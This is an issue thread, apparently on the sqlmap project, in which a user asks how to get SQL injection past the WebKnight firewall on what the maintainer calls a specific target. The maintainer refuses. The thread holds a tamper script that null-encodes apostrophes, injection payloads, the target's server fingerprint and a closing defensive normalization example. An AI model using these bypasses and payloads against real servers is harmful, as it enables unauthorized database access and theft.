Closed angelz12 closed 9 years ago
If you don't have a solution to give I'll need to close this down
http://ipv4.os3.nl/_media/2013-2014/courses/ot/andreas_george.pdf http://www.exploit-db.com/papers/17934/
frequencies for the bypass http://nl.ijs.si:3003/cuwi/dgt_en/frequencies/lc
This I found, maybe this works...
A) http://ipv4.os3.nl/_media/2013-2014/courses/ot/andreas_george.pdf says: When running the same test against WebKnight we had one successful attempt while using the ‘apostrophenullencode’ tamper script
-> so you can use --tamper=apostrophenullencode
which I doubt will work in your case
B) http://www.exploit-db.com/papers/17934/ says: From this situation, Webknight use SQL keywords filtering when we use "HTTP contamination" by insert "%" into SQL keywords WAF is bypassed and sending these command to Web server: "id=10 and 1=0/(select top 1 table_name from information_schema.tables)" because "%" is cutter in web server.
-> this doesn't work. Correct me if I am wrong.
Please don't open this kind of Issues if you don't have a solution to give. Learn something about WAF bypasses and then come back. I'll just close further requests like this as invalid
p.s. its obvious from previous Issue requests that you have one target with WebKnight on it. Don't open this kind of Issue requests where you are openly asking for a help to attack a specific web server.
So that's the normal ‘apostrophenullencode’; how can I activate it? The script bypass is green.
```python
"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.enums import PRIORITY

priority = PRIORITY.LOWEST


def dependencies():
    pass


def tamper(payload, **kwargs):
    """
    Replaces apostrophe character with its illegal double unicode counterpart

    >>> tamper("1 AND '1'='1")
    '1 AND %00%271%00%27=%00%271'
    """

    return payload.replace('\'', "%00%27") if payload else payload
```
--------------------------------------------- bypass from the PDF file, I hope that's correct, watch here:
‘apostrophenullencode’ changed according to the PDF
```python
"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.enums import PRIORITY

priority = PRIORITY.LOWEST


def dependencies():
    pass


def tamper(payload, **kwargs):
    """
    Replaces apostrophe character with its illegal double unicode counterpart

    >>> tamper("' or '1'='1")
    '%00%27 or %00%271%00%27=%00%271'
    """

    return payload.replace('\'', "%00%27") if payload else payload
```
When I open these scripts in Python the bypass is in green, like a notice; isn't it activated? Can you show me how the bypass can be running, or am I thinking wrong here?
```
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
```
http://www.aqtronix.com/?PageID=99
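As an added illustration from the filtering side (this is not code from sqlmap, from the thread or from the papers linked above), the snippet below shows why a check that inspects the raw, still-encoded parameter value misses the `%00%27` form the tamper script produces, and how percent-decoding and dropping NUL bytes before inspection restores the match. The function names and the sample payload are my own; the sample reuses the doctest input from the tamper script.

```python
from urllib.parse import unquote


def apostrophe_null_encode(payload: str) -> str:
    """Same transformation as the tamper script above: ' -> %00%27."""
    return payload.replace("'", "%00%27") if payload else payload


def naive_has_apostrophe(raw: str) -> bool:
    """A filter that inspects the raw, still-encoded parameter value.
    It never sees a literal apostrophe once the payload is encoded."""
    return "'" in raw


def normalize(raw: str) -> str:
    """Percent-decode (bounded loop, so double encoding is also unwrapped)
    and strip NUL bytes before inspection; %00%27 then collapses back to
    a plain apostrophe, which is what the DBMS driver effectively sees."""
    decoded = raw
    for _ in range(3):  # bounded: never loop forever on pathological input
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded.replace("\x00", "")


def normalized_has_apostrophe(raw: str) -> bool:
    """The same check, applied after normalization."""
    return "'" in normalize(raw)


# Constructed sample: the doctest payload from the tamper script above.
SAMPLE = "1 AND '1'='1"
ENCODED = apostrophe_null_encode(SAMPLE)  # '1 AND %00%271%00%27=%00%271'

if __name__ == "__main__":
    print("encoded:             ", ENCODED)
    print("naive check hits:    ", naive_has_apostrophe(ENCODED))       # False
    print("normalized check hits", normalized_has_apostrophe(ENCODED))  # True
```

The point for a WAF or application filter is that matching must happen on the decoded, NUL-stripped value, not on the wire form.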